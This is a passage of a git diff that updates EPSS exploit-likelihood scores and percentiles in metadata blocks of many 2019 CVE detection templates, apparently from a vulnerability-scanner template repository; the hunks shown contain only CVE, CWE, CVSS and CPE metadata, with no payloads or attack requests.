b/http/cves/2019/CVE-2019-16097.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.5 cve-id: CVE-2019-16097 cwe-id: CWE-862 - epss-score: 0.96909 - epss-percentile: 0.99644 + epss-score: 0.96903 + epss-percentile: 0.9965 cpe: cpe:2.3:a:linuxfoundation:harbor:1.7.0:-:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-16123.yaml b/http/cves/2019/CVE-2019-16123.yaml index 5644488f08..ad5653db8b 100644 --- a/http/cves/2019/CVE-2019-16123.yaml +++ b/http/cves/2019/CVE-2019-16123.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-16123 cwe-id: CWE-22 epss-score: 0.72953 - epss-percentile: 0.97792 + epss-percentile: 0.97822 cpe: cpe:2.3:a:kartatopia:piluscart:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-16278.yaml b/http/cves/2019/CVE-2019-16278.yaml index 0c3d0a7262..ca894a55e5 100644 --- a/http/cves/2019/CVE-2019-16278.yaml +++ b/http/cves/2019/CVE-2019-16278.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-16278 cwe-id: CWE-22 - epss-score: 0.97359 - epss-percentile: 0.9988 + epss-score: 0.97374 + epss-percentile: 0.99893 cpe: cpe:2.3:a:nazgul:nostromo_nhttpd:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-16313.yaml b/http/cves/2019/CVE-2019-16313.yaml index e810df30c6..d685effb4e 100644 --- a/http/cves/2019/CVE-2019-16313.yaml +++ b/http/cves/2019/CVE-2019-16313.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-16313 cwe-id: CWE-798 - epss-score: 0.02366 - epss-percentile: 0.88654 + epss-score: 0.02898 + epss-percentile: 0.89743 cpe: cpe:2.3:o:ifw8:fr6_firmware:4.31:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-16332.yaml b/http/cves/2019/CVE-2019-16332.yaml index 6e60e634fd..7e1df6a612 100644 --- a/http/cves/2019/CVE-2019-16332.yaml +++ b/http/cves/2019/CVE-2019-16332.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-16332 cwe-id: CWE-79 epss-score: 0.00303 - epss-percentile: 0.66244 + epss-percentile: 0.66434 cpe: cpe:2.3:a:api_bearer_auth_project:api_bearer_auth:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-16525.yaml b/http/cves/2019/CVE-2019-16525.yaml index 66d9996a3b..818586c92d 100644 --- a/http/cves/2019/CVE-2019-16525.yaml +++ b/http/cves/2019/CVE-2019-16525.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-16525 cwe-id: CWE-79 epss-score: 0.00323 - epss-percentile: 0.67427 + epss-percentile: 0.67586 cpe: cpe:2.3:a:checklist:checklist:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-1653.yaml b/http/cves/2019/CVE-2019-1653.yaml index b44446be1e..200e088350 100644 --- a/http/cves/2019/CVE-2019-1653.yaml +++ b/http/cves/2019/CVE-2019-1653.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-1653 cwe-id: CWE-200,CWE-284 - epss-score: 0.97567 - epss-percentile: 1 + epss-score: 0.97555 + epss-percentile: 0.99998 cpe: cpe:2.3:o:cisco:rv320_firmware:1.4.2.15:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-16662.yaml b/http/cves/2019/CVE-2019-16662.yaml index 27bc513444..1233cfa8ec 100644 --- a/http/cves/2019/CVE-2019-16662.yaml +++ b/http/cves/2019/CVE-2019-16662.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-16662 cwe-id: CWE-78 - epss-score: 0.97555 - epss-percentile: 0.99996 + epss-score: 0.97525 + epss-percentile: 0.9999 cpe: cpe:2.3:a:rconfig:rconfig:3.9.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-16920.yaml b/http/cves/2019/CVE-2019-16920.yaml index a24916a7c8..a61a6d7901 100644 --- a/http/cves/2019/CVE-2019-16920.yaml +++ b/http/cves/2019/CVE-2019-16920.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-16920 cwe-id: CWE-78 epss-score: 0.96307 - epss-percentile: 0.99415 + epss-percentile: 0.99432 cpe: cpe:2.3:o:dlink:dir-655_firmware:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2019/CVE-2019-16931.yaml b/http/cves/2019/CVE-2019-16931.yaml index 9112c3efa1..bdf86946e9 100644 --- a/http/cves/2019/CVE-2019-16931.yaml +++ b/http/cves/2019/CVE-2019-16931.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2019-16931 cwe-id: CWE-79 epss-score: 0.00244 - epss-percentile: 0.62227 + epss-percentile: 0.62382 cpe: cpe:2.3:a:themeisle:visualizer:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-16932.yaml b/http/cves/2019/CVE-2019-16932.yaml index 7b5f53364c..210203de86 100644 --- a/http/cves/2019/CVE-2019-16932.yaml +++ b/http/cves/2019/CVE-2019-16932.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2019-16932 cwe-id: CWE-918 epss-score: 0.53434 - epss-percentile: 0.97294 + epss-percentile: 0.97316 cpe: cpe:2.3:a:themeisle:visualizer:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-16996.yaml b/http/cves/2019/CVE-2019-16996.yaml index 2dd84dec27..d47ab6f649 100644 --- a/http/cves/2019/CVE-2019-16996.yaml +++ b/http/cves/2019/CVE-2019-16996.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.2 cve-id: CVE-2019-16996 cwe-id: CWE-89 - epss-score: 0.24401 - epss-percentile: 0.96162 + epss-score: 0.25861 + epss-percentile: 0.96276 cpe: cpe:2.3:a:metinfo:metinfo:7.0.0:beta:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-16997.yaml b/http/cves/2019/CVE-2019-16997.yaml index 8c7de1ecdb..184e5db165 100644 --- a/http/cves/2019/CVE-2019-16997.yaml +++ b/http/cves/2019/CVE-2019-16997.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.2 cve-id: CVE-2019-16997 cwe-id: CWE-89 - epss-score: 0.24401 - epss-percentile: 0.96162 + epss-score: 0.25861 + epss-percentile: 0.96276 cpe: cpe:2.3:a:metinfo:metinfo:7.0.0:beta:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-17270.yaml b/http/cves/2019/CVE-2019-17270.yaml index 7aa9199c13..d06707d17c 100644 --- a/http/cves/2019/CVE-2019-17270.yaml +++ b/http/cves/2019/CVE-2019-17270.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-17270 cwe-id: CWE-78 epss-score: 0.94652 - epss-percentile: 0.99057 + epss-percentile: 0.99074 cpe: cpe:2.3:a:yachtcontrol:yachtcontrol:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-17382.yaml b/http/cves/2019/CVE-2019-17382.yaml index 43a582a54b..c6564963b9 100644 --- a/http/cves/2019/CVE-2019-17382.yaml +++ b/http/cves/2019/CVE-2019-17382.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-17382 cwe-id: CWE-639 epss-score: 0.3141 - epss-percentile: 0.96537 + epss-percentile: 0.9657 cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* metadata: max-request: 100 diff --git a/http/cves/2019/CVE-2019-17418.yaml b/http/cves/2019/CVE-2019-17418.yaml index 03addf9f96..b39239c2e0 100644 --- a/http/cves/2019/CVE-2019-17418.yaml +++ b/http/cves/2019/CVE-2019-17418.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.2 cve-id: CVE-2019-17418 cwe-id: CWE-89 - epss-score: 0.44305 - epss-percentile: 0.97027 + epss-score: 0.46136 + epss-percentile: 0.97094 cpe: cpe:2.3:a:metinfo:metinfo:7.0.0:beta:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-17444.yaml b/http/cves/2019/CVE-2019-17444.yaml index 97879912db..ebda0becd8 100644 --- a/http/cves/2019/CVE-2019-17444.yaml +++ b/http/cves/2019/CVE-2019-17444.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-17444 cwe-id: CWE-521 - epss-score: 0.08495 - epss-percentile: 0.93788 + epss-score: 0.06182 + epss-percentile: 0.92849 cpe: cpe:2.3:a:jfrog:artifactory:*:*:*:*:*:-:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-17503.yaml b/http/cves/2019/CVE-2019-17503.yaml index a1f1073405..964e631926 100644 --- a/http/cves/2019/CVE-2019-17503.yaml +++ b/http/cves/2019/CVE-2019-17503.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-17503 cwe-id: CWE-425 epss-score: 0.00433 - epss-percentile: 0.71734 + epss-percentile: 0.71885 cpe: cpe:2.3:a:kirona:dynamic_resource_scheduling:5.5.3.5:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-17506.yaml b/http/cves/2019/CVE-2019-17506.yaml index 755ff768f3..209a59a31e 100644 --- a/http/cves/2019/CVE-2019-17506.yaml +++ b/http/cves/2019/CVE-2019-17506.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-17506 cwe-id: CWE-306 - epss-score: 0.8777 - epss-percentile: 0.98366 + epss-score: 0.90196 + epss-percentile: 0.98557 cpe: cpe:2.3:o:dlink:dir-868l_b1_firmware:2.03:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-17538.yaml b/http/cves/2019/CVE-2019-17538.yaml index 9345749c85..6851a02858 100644 --- a/http/cves/2019/CVE-2019-17538.yaml +++ b/http/cves/2019/CVE-2019-17538.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-17538 cwe-id: CWE-22 - epss-score: 0.00748 - epss-percentile: 0.78825 + epss-score: 0.00812 + epss-percentile: 0.79878 cpe: cpe:2.3:a:jnoj:jiangnan_online_judge:0.8.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-17558.yaml b/http/cves/2019/CVE-2019-17558.yaml index 30cd43c8b8..5bace1b130 100644 --- a/http/cves/2019/CVE-2019-17558.yaml +++ b/http/cves/2019/CVE-2019-17558.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-17558 cwe-id: CWE-74 - epss-score: 0.97507 - epss-percentile: 0.9998 + epss-score: 0.97517 + epss-percentile: 0.99986 cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2019/CVE-2019-17574.yaml b/http/cves/2019/CVE-2019-17574.yaml index 480860f922..efc7fe5aa3 100644 --- a/http/cves/2019/CVE-2019-17574.yaml +++ b/http/cves/2019/CVE-2019-17574.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.1 cve-id: 'CVE-2019-17574' cwe-id: CWE-639 - epss-score: 0.12099 - epss-percentile: 0.94819 + epss-score: 0.12974 + epss-percentile: 0.94977 cpe: cpe:2.3:a:code-atlantic:popup_maker:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-17662.yaml b/http/cves/2019/CVE-2019-17662.yaml index dd845c014d..0b3861bfd6 100644 --- a/http/cves/2019/CVE-2019-17662.yaml +++ b/http/cves/2019/CVE-2019-17662.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-17662 cwe-id: CWE-22 - epss-score: 0.65955 - epss-percentile: 0.976 + epss-score: 0.68973 + epss-percentile: 0.97703 cpe: cpe:2.3:a:cybelsoft:thinvnc:1.0:b1:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-1821.yaml b/http/cves/2019/CVE-2019-1821.yaml index 34a8782d35..33ec574648 100644 --- a/http/cves/2019/CVE-2019-1821.yaml +++ b/http/cves/2019/CVE-2019-1821.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-1821 cwe-id: CWE-20 epss-score: 0.96882 - epss-percentile: 0.99633 + epss-percentile: 0.99644 cpe: cpe:2.3:a:cisco:evolved_programmable_network_manager:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-18371.yaml b/http/cves/2019/CVE-2019-18371.yaml index 9e129176ad..7a035119bf 100644 --- a/http/cves/2019/CVE-2019-18371.yaml +++ b/http/cves/2019/CVE-2019-18371.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-18371 cwe-id: CWE-22 epss-score: 0.02376 - epss-percentile: 0.88678 + epss-percentile: 0.88739 cpe: cpe:2.3:o:mi:millet_router_3g_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-18393.yaml b/http/cves/2019/CVE-2019-18393.yaml index b7647f2fde..1b8896a34b 100644 --- a/http/cves/2019/CVE-2019-18393.yaml +++ b/http/cves/2019/CVE-2019-18393.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-18393 cwe-id: CWE-22 epss-score: 0.00161 - epss-percentile: 0.52509 + epss-percentile: 0.52584 cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-18394.yaml b/http/cves/2019/CVE-2019-18394.yaml index e1b9d0979d..b96aa4e469 100644 --- a/http/cves/2019/CVE-2019-18394.yaml +++ b/http/cves/2019/CVE-2019-18394.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-18394 cwe-id: CWE-918 epss-score: 0.62096 - epss-percentile: 0.97511 + epss-percentile: 0.97541 cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-18665.yaml b/http/cves/2019/CVE-2019-18665.yaml index b8033193e3..cd46781dda 100644 --- a/http/cves/2019/CVE-2019-18665.yaml +++ b/http/cves/2019/CVE-2019-18665.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-18665 cwe-id: CWE-22 - epss-score: 0.1062 - epss-percentile: 0.9448 + epss-score: 0.08504 + epss-percentile: 0.93837 cpe: cpe:2.3:a:secudos:domos:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-18818.yaml b/http/cves/2019/CVE-2019-18818.yaml index 90dee86243..bf6feb53ef 100644 --- a/http/cves/2019/CVE-2019-18818.yaml +++ b/http/cves/2019/CVE-2019-18818.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-18818 cwe-id: CWE-640 - epss-score: 0.87514 - epss-percentile: 0.98352 + epss-score: 0.87533 + epss-percentile: 0.98385 cpe: cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-18922.yaml b/http/cves/2019/CVE-2019-18922.yaml index 5c65e4d3ec..653e449514 100644 --- a/http/cves/2019/CVE-2019-18922.yaml +++ b/http/cves/2019/CVE-2019-18922.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-18922 cwe-id: CWE-22 - epss-score: 0.29615 - epss-percentile: 0.96446 + epss-score: 0.31054 + epss-percentile: 0.96551 cpe: cpe:2.3:o:alliedtelesis:at-gs950\/8_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-18957.yaml b/http/cves/2019/CVE-2019-18957.yaml index 31a33a596e..3909cba77e 100644 --- a/http/cves/2019/CVE-2019-18957.yaml +++ b/http/cves/2019/CVE-2019-18957.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-18957 cwe-id: CWE-79 epss-score: 0.00375 - epss-percentile: 0.69704 + epss-percentile: 0.69873 cpe: cpe:2.3:a:microstrategy:microstrategy_library:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-1898.yaml b/http/cves/2019/CVE-2019-1898.yaml index 5ea99c11ee..299c4313d1 100644 --- a/http/cves/2019/CVE-2019-1898.yaml +++ b/http/cves/2019/CVE-2019-1898.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-1898 cwe-id: CWE-425,CWE-285 epss-score: 0.07254 - epss-percentile: 0.93337 + epss-percentile: 0.93384 cpe: cpe:2.3:o:cisco:rv110w_firmware:-:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-19134.yaml b/http/cves/2019/CVE-2019-19134.yaml index fb8d51ac60..6839000dfd 100644 --- a/http/cves/2019/CVE-2019-19134.yaml +++ b/http/cves/2019/CVE-2019-19134.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-19134 cwe-id: CWE-79 epss-score: 0.00203 - epss-percentile: 0.58076 + epss-percentile: 0.58236 cpe: cpe:2.3:a:heroplugins:hero_maps_premium:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-19368.yaml b/http/cves/2019/CVE-2019-19368.yaml index 18c3de9b42..0ab5f30356 100644 --- a/http/cves/2019/CVE-2019-19368.yaml +++ b/http/cves/2019/CVE-2019-19368.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-19368 cwe-id: CWE-79 epss-score: 0.00624 - epss-percentile: 0.76539 + epss-percentile: 0.76639 cpe: cpe:2.3:a:maxum:rumpus:8.2.9.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-1943.yaml b/http/cves/2019/CVE-2019-1943.yaml index f271323586..761fa56953 100644 --- a/http/cves/2019/CVE-2019-1943.yaml +++ b/http/cves/2019/CVE-2019-1943.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-1943 cwe-id: CWE-601 epss-score: 0.03526 - epss-percentile: 0.9056 + epss-percentile: 0.90635 cpe: cpe:2.3:o:cisco:sg200-50_firmware:-:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2019/CVE-2019-19781.yaml b/http/cves/2019/CVE-2019-19781.yaml index 889bb14fbb..48c93323a7 100644 --- a/http/cves/2019/CVE-2019-19781.yaml +++ b/http/cves/2019/CVE-2019-19781.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-19781 cwe-id: CWE-22 - epss-score: 0.97507 - epss-percentile: 0.99981 + epss-score: 0.97485 + epss-percentile: 0.99967 cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:10.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-19824.yaml b/http/cves/2019/CVE-2019-19824.yaml index f1e86c31c6..87a7d50ccf 100644 --- a/http/cves/2019/CVE-2019-19824.yaml +++ b/http/cves/2019/CVE-2019-19824.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.8 cve-id: CVE-2019-19824 cwe-id: CWE-78 - epss-score: 0.96686 - epss-percentile: 0.99556 + epss-score: 0.96632 + epss-percentile: 0.99548 cpe: cpe:2.3:o:totolink:a3002ru_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-19908.yaml b/http/cves/2019/CVE-2019-19908.yaml index 8434057f27..2adb4995df 100644 --- a/http/cves/2019/CVE-2019-19908.yaml +++ b/http/cves/2019/CVE-2019-19908.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-19908 cwe-id: CWE-79 epss-score: 0.00673 - epss-percentile: 0.77527 + epss-percentile: 0.77654 cpe: cpe:2.3:a:ciprianmp:phpmychat-plus:1.98:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-19985.yaml b/http/cves/2019/CVE-2019-19985.yaml index 32ccd1fe46..a3260686f3 100644 --- a/http/cves/2019/CVE-2019-19985.yaml +++ b/http/cves/2019/CVE-2019-19985.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-19985 cwe-id: CWE-862 epss-score: 0.1336 - epss-percentile: 0.95023 + epss-percentile: 0.95044 cpe: cpe:2.3:a:icegram:email_subscribers_\&_newsletters:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-20085.yaml b/http/cves/2019/CVE-2019-20085.yaml index 1c21fe3be2..a804e01148 100644 --- a/http/cves/2019/CVE-2019-20085.yaml +++ b/http/cves/2019/CVE-2019-20085.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-20085 cwe-id: CWE-22 epss-score: 0.69009 - epss-percentile: 0.97678 + epss-percentile: 0.97704 cpe: cpe:2.3:o:tvt:nvms-1000_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-20141.yaml b/http/cves/2019/CVE-2019-20141.yaml index 991859b559..421fed44a6 100644 --- a/http/cves/2019/CVE-2019-20141.yaml +++ b/http/cves/2019/CVE-2019-20141.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-20141 cwe-id: CWE-79 epss-score: 0.00125 - epss-percentile: 0.46692 + epss-percentile: 0.46806 cpe: cpe:2.3:a:laborator:neon:2.0:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-20183.yaml b/http/cves/2019/CVE-2019-20183.yaml index 3eb7cd9740..f39d26e571 100644 --- a/http/cves/2019/CVE-2019-20183.yaml +++ b/http/cves/2019/CVE-2019-20183.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.2 cve-id: CVE-2019-20183 cwe-id: CWE-434 - epss-score: 0.02473 - epss-percentile: 0.8889 + epss-score: 0.03427 + epss-percentile: 0.90515 cpe: cpe:2.3:a:employee_records_system_project:employee_records_system:1.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-20210.yaml b/http/cves/2019/CVE-2019-20210.yaml index 233a427e71..1eaa5345c8 100644 --- a/http/cves/2019/CVE-2019-20210.yaml +++ b/http/cves/2019/CVE-2019-20210.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2019-20210 cwe-id: CWE-79 - epss-score: 0.00822 - epss-percentile: 0.7991 + epss-score: 0.00938 + epss-percentile: 0.81311 cpe: cpe:2.3:a:cththemes:citybook:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-20224.yaml b/http/cves/2019/CVE-2019-20224.yaml index 7fbc35b9de..fd95b12f4a 100644 --- a/http/cves/2019/CVE-2019-20224.yaml +++ b/http/cves/2019/CVE-2019-20224.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.8 cve-id: CVE-2019-20224 cwe-id: CWE-78 - epss-score: 0.2078 - epss-percentile: 0.95904 + epss-score: 0.18764 + epss-percentile: 0.95774 cpe: cpe:2.3:a:artica:pandora_fms:7.0_ng:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-20933.yaml b/http/cves/2019/CVE-2019-20933.yaml index 00a712f467..7ab6555cf7 100644 --- a/http/cves/2019/CVE-2019-20933.yaml +++ b/http/cves/2019/CVE-2019-20933.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-20933 cwe-id: CWE-287 epss-score: 0.04913 - epss-percentile: 0.91936 + epss-percentile: 0.91999 cpe: cpe:2.3:a:influxdata:influxdb:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-2578.yaml b/http/cves/2019/CVE-2019-2578.yaml index a0a8842065..9f9badf94a 100644 --- a/http/cves/2019/CVE-2019-2578.yaml +++ b/http/cves/2019/CVE-2019-2578.yaml @@ -19,7 +19,7 @@ info: cvss-score: 8.6 cve-id: CVE-2019-2578 epss-score: 0.00751 - epss-percentile: 0.78872 + epss-percentile: 0.78961 cpe: cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-2579.yaml b/http/cves/2019/CVE-2019-2579.yaml index 7c8ce9637b..4f5ec3390c 100644 --- a/http/cves/2019/CVE-2019-2579.yaml +++ b/http/cves/2019/CVE-2019-2579.yaml @@ -19,7 +19,7 @@ info: cvss-score: 4.3 cve-id: CVE-2019-2579 epss-score: 0.00493 - epss-percentile: 0.73478 + epss-percentile: 0.73611 cpe: cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-2588.yaml b/http/cves/2019/CVE-2019-2588.yaml index a9db603a34..7d12978655 100644 --- a/http/cves/2019/CVE-2019-2588.yaml +++ b/http/cves/2019/CVE-2019-2588.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N cvss-score: 4.9 cve-id: CVE-2019-2588 - epss-score: 0.06432 - epss-percentile: 0.92937 + epss-score: 0.08225 + epss-percentile: 0.93742 cpe: cpe:2.3:a:oracle:business_intelligence_publisher:11.1.1.9.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-2616.yaml b/http/cves/2019/CVE-2019-2616.yaml index 23885816df..6b4b10d6fd 100644 --- a/http/cves/2019/CVE-2019-2616.yaml +++ b/http/cves/2019/CVE-2019-2616.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cve-id: CVE-2019-2616 - epss-score: 0.93837 - epss-percentile: 0.98923 + epss-score: 0.93111 + epss-percentile: 0.98865 cpe: cpe:2.3:a:oracle:business_intelligence_publisher:11.1.1.9.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-2725.yaml b/http/cves/2019/CVE-2019-2725.yaml index 855b59f1dd..38d5cf34c5 100644 --- a/http/cves/2019/CVE-2019-2725.yaml +++ b/http/cves/2019/CVE-2019-2725.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-2725 cwe-id: CWE-74 - epss-score: 0.97559 - epss-percentile: 0.99997 + epss-score: 0.97572 + epss-percentile: 1 cpe: cpe:2.3:a:oracle:agile_plm:9.3.3:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-2729.yaml b/http/cves/2019/CVE-2019-2729.yaml index aea86450a0..c8e599842e 100644 --- a/http/cves/2019/CVE-2019-2729.yaml +++ b/http/cves/2019/CVE-2019-2729.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2019-2729 cwe-id: CWE-284 epss-score: 0.97093 - epss-percentile: 0.99722 + epss-percentile: 0.9973 cpe: cpe:2.3:a:oracle:communications_diameter_signaling_router:8.0:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2019/CVE-2019-2767.yaml b/http/cves/2019/CVE-2019-2767.yaml index f891757e96..e21dabecc3 100644 --- a/http/cves/2019/CVE-2019-2767.yaml +++ b/http/cves/2019/CVE-2019-2767.yaml @@ -18,7 +18,7 @@ info: cvss-score: 7.2 cve-id: CVE-2019-2767 epss-score: 0.14972 - epss-percentile: 0.95266 + epss-percentile: 0.95282 cpe: cpe:2.3:a:oracle:bi_publisher:11.1.1.9.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-3396.yaml b/http/cves/2019/CVE-2019-3396.yaml index b58b5ffc4c..23a47e1b85 100644 --- a/http/cves/2019/CVE-2019-3396.yaml +++ b/http/cves/2019/CVE-2019-3396.yaml @@ -17,7 +17,7 @@ info: cvss-score: 9.8 cve-id: CVE-2019-3396 cwe-id: CWE-22 - epss-score: 0.97507 + epss-score: 0.97502 epss-percentile: 0.99979 cpe: cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2019/CVE-2019-3398.yaml b/http/cves/2019/CVE-2019-3398.yaml index 6a27ef1d8b..a94d88eee2 100644 --- a/http/cves/2019/CVE-2019-3398.yaml +++ b/http/cves/2019/CVE-2019-3398.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.8 cve-id: CVE-2019-3398 cwe-id: CWE-22 - epss-score: 0.97256 - epss-percentile: 0.99814 + epss-score: 0.9722 + epss-percentile: 0.99801 cpe: cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:* metadata: max-request: 5 diff --git a/http/cves/2019/CVE-2019-3401.yaml b/http/cves/2019/CVE-2019-3401.yaml index dd2566cdf5..09ab9f7a58 100644 --- a/http/cves/2019/CVE-2019-3401.yaml +++ b/http/cves/2019/CVE-2019-3401.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2019-3401 cwe-id: CWE-863 epss-score: 0.0055 - epss-percentile: 0.74903 + epss-percentile: 0.7504 cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-3402.yaml b/http/cves/2019/CVE-2019-3402.yaml index 8a9420aa78..7f3c175e81 100644 --- a/http/cves/2019/CVE-2019-3402.yaml +++ 